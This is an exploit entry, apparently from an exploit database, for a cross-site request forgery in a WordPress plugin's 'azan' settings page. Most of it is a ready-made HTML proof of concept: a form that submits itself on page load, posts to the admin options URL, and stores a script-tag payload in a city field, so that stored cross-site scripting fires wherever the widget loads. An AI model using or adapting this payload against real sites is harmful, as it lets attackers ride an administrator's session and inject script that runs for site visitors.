## https://sploitus.com/exploit?id=WPEX-ID:19CD60DD-8599-4AF3-99DB-C42DE504606C
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()"><form action="http://example.com/wp-admin/options-general.php?page=azan" method="post"><input type="hidden" name="azan-lat" value="1" /><input type="hidden" name="azan-lng" value="2" /><input type="hidden" name="azan_custom_cities" value='csrf<script>alert(999)</script>,2,2,3' /><input type="hidden" name="azan-city" value="32" /><input type="submit" value="Submit" /></form></body>
```
If the widget is loaded on a page, the XSS will trigger